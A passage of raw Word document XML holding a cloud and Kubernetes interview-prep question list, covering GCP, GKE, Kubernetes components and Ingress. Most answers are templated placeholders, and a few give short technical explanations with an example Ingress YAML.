      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Experience &amp; Background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Walk me through your current role at Capgemini.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. What does your day-to-day work look like?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Experience &amp; Background</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Experience &amp; Background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does your day-to-day work look like?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. What are your major responsibilities?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Experience &amp; Background</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Experience &amp; Background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your major responsibilities?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Which project are you currently working on?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Experience &amp; Background</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Experience &amp; Background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project are you currently working on?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Why are you looking for a change?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Experience &amp; Background</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Experience &amp; Background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Why are you looking for a change?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Why do you want to join our company?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Experience &amp; Background</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Experience &amp; Background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Why do you want to join our company?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Roughly how much of your week would you say was actually spent working in GCP rather than adjacent tools or other clouds?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud &amp; GCP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cloud &amp;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Roughly how much of your week would you say was actually spent working in GCP rather than adjacent tools or other clouds?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Go through the core GCP areas one by one.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud &amp; GCP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cloud &amp;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Go through the core GCP areas one by one.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. On Compute Engine, what kinds of production issues have you personally handled?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud &amp; GCP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cloud &amp;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On Compute Engine, what kinds of production issues have you personally handled?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. What was the hardest Compute Engine issue you troubleshot end-to-end?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud &amp; GCP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cloud &amp;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was the hardest Compute Engine issue you troubleshot end-to-end?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. Which GCP services have you used in production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud &amp; GCP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cloud &amp;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GCP services have you used in production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. Explain VPC in GCP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud &amp; GCP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A VPC in GCP is a virtual network that connects cloud resources. It defines subnets, routes, firewall rules, private access, peering, NAT, and connectivity to on-prem networks.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>VPC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Q13. Explain IAM roles and service accounts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud &amp; GCP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cloud &amp;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IAM roles and service accounts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. How do you secure workloads in GCP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud &amp; GCP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cloud &amp;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secure workloads in GCP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. Explain Cloud Storage classes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud &amp; GCP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cloud &amp;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Cloud Storage classes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. What is Cloud SQL?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud &amp; GCP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cloud &amp;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Cloud SQL?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q17. Have you worked with GKE?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud &amp; GCP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cloud &amp;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with GKE?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q18. Explain GKE architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud &amp; GCP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cloud &amp;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GKE architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q19. What is the difference between GKE Autopilot and Standard?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud &amp; GCP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: GKE Autopilot manages nodes, scaling, and many operational details for you, charging mainly by pod resources. GKE Standard gives more control over node pools, machine types, system components, and advanced tuning. Autopilot is simpler and secure by default, while Standard is better when deep node-level customization is required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q20. How do you troubleshoot a GKE cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud &amp; GCP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cloud &amp;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troubleshoot a GKE cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q21. Explain Kubernetes architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Kubernetes architecture consists of two main parts:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Control Plane (Master Node)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Worker Nodes</w:t>
        <w:br/>
        <w:t>The Control Plane manages the entire cluster, while Worker Nodes run the application workloads.</w:t>
        <w:br/>
        <w:t>1. Control Plane Components</w:t>
        <w:br/>
        <w:t>API Server</w:t>
        <w:br/>
        <w:t>The entry point of the cluster.</w:t>
        <w:br/>
        <w:t>All kubectl commands and internal communications go through the API Server.</w:t>
        <w:br/>
        <w:t>etcd</w:t>
        <w:br/>
        <w:t>A distributed key-value store that stores cluster state, configuration, secrets, and metadata.</w:t>
        <w:br/>
        <w:t>Scheduler</w:t>
        <w:br/>
        <w:t>Assigns Pods to appropriate worker nodes based on resources, policies, and constraints.</w:t>
        <w:br/>
        <w:t>Controller Manager</w:t>
        <w:br/>
        <w:t>Runs controllers that continuously monitor cluster state and ensure desired state is maintained.</w:t>
        <w:br/>
        <w:t>Examples:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Node Controller</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ReplicaSet Controller</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Deployment Controller</w:t>
        <w:br/>
        <w:t>Cloud Controller Manager</w:t>
        <w:br/>
        <w:t>Integrates Kubernetes with cloud providers like AWS, Azure, and GCP.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Worker Node Components</w:t>
        <w:br/>
        <w:t>Kubelet</w:t>
        <w:br/>
        <w:t>Agent running on each node.</w:t>
        <w:br/>
        <w:t>Communicates with API Server and ensures containers are running properly.</w:t>
        <w:br/>
        <w:t>Container Runtime</w:t>
        <w:br/>
        <w:t>Responsible for running containers.</w:t>
        <w:br/>
        <w:t>Examples:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Docker</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * containerd</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * CRI-O</w:t>
        <w:br/>
        <w:t>Kube Proxy</w:t>
        <w:br/>
        <w:t>Handles networking and service communication inside the cluster.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Pod</w:t>
        <w:br/>
        <w:t>Smallest deployable unit in Kubernetes.</w:t>
        <w:br/>
        <w:t>A Pod can contain one or more containers sharing the same network and storage.</w:t>
        <w:br/>
        <w:t>________________</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q22. What are Pods?</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Pods?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q23. What is the difference between Deployment, StatefulSet, and DaemonSet?</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Deployment, StatefulSet, and DaemonSet?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q24. What is a ReplicaSet?</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a ReplicaSet?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q25. Explain Services in Kubernetes.</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Services in Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q26. Explain FQDN in Kubernetes.</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FQDN in Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q27. How does pod-to-pod communication work?</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pod-to-pod communication work?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q28. What are liveness and readiness probes?</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liveness and readiness probes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q29. What happens if a liveness probe fails?</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happens if a liveness probe fails?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q30. What happens if a readiness probe fails?</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happens if a readiness probe fails?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q31. Explain ConfigMaps and Secrets.</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ConfigMaps and Secrets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q32. What are Persistent Volumes and PVCs?</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Persistent Volumes and PVCs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q33. Explain Ingress.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Ingress in Kubernetes is a resource that manages external HTTP/HTTPS access to services inside a cluster, typically by routing traffic based on rules like hostnames and paths.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Ingress acts like a smart traffic router (Layer 7) that controls how external requests reach internal Services.</w:t>
        <w:br/>
        <w:t>Instead of exposing every Service with a LoadBalancer, Ingress provides a single entry point.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Ingress is used</w:t>
        <w:br/>
        <w:t>Without Ingress:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Each service needs its own external IP or LoadBalancer</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Expensive and hard to manage</w:t>
        <w:br/>
        <w:t>With Ingress:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * One external entry point</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Routes traffic to multiple services</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Based on rules like domain or URL path</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What Ingress does</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Routes HTTP/HTTPS traffic</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Supports host-based routing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Supports path-based routing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Handles SSL/TLS termination</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Centralizes external access management</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Important: Ingress vs Ingress Controller</w:t>
        <w:br/>
        <w:t>1. Ingress (resource)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Just a set of routing rules</w:t>
        <w:br/>
        <w:t>2. Ingress Controller</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Actual component that implements those rules</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Examples:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * NGINX Ingress Controller</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Traefik</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * HAProxy</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * AWS ALB Ingress Controller</w:t>
        <w:br/>
        <w:t>Without a controller, Ingress does nothing.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example use case</w:t>
        <w:br/>
        <w:t>You have:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * frontend-service</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * backend-service</w:t>
        <w:br/>
        <w:t>You want:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * example.com/ → frontend</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * example.com/api → backend</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example Ingress YAML</w:t>
        <w:br/>
        <w:t>apiVersion: networking.k8s.io/v1</w:t>
        <w:br/>
        <w:t>kind: Ingress</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: app-ingress</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  rules:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - host: example.com</w:t>
        <w:br/>
        <w:t xml:space="preserve">    http:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      paths:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - path: /</w:t>
        <w:br/>
        <w:t xml:space="preserve">        pathType: Prefix</w:t>
        <w:br/>
        <w:t xml:space="preserve">        backend:</w:t>
        <w:br/>
        <w:t xml:space="preserve">          service:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            name: frontend-service</w:t>
        <w:br/>
        <w:t xml:space="preserve">            port:</w:t>
        <w:br/>
        <w:t xml:space="preserve">              number: 80</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - path: /api</w:t>
        <w:br/>
        <w:t xml:space="preserve">        pathType: Prefix</w:t>
        <w:br/>
        <w:t xml:space="preserve">        backend:</w:t>
        <w:br/>
        <w:t xml:space="preserve">          service:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            name: backend-service</w:t>
        <w:br/>
        <w:t xml:space="preserve">            port:</w:t>
        <w:br/>
        <w:t xml:space="preserve">              number: 80</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How traffic flows</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. User hits example.com</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Request reaches Ingress Controller</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Controller checks Ingress rules</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Routes traffic to correct Service</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Service forwards to Pods</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
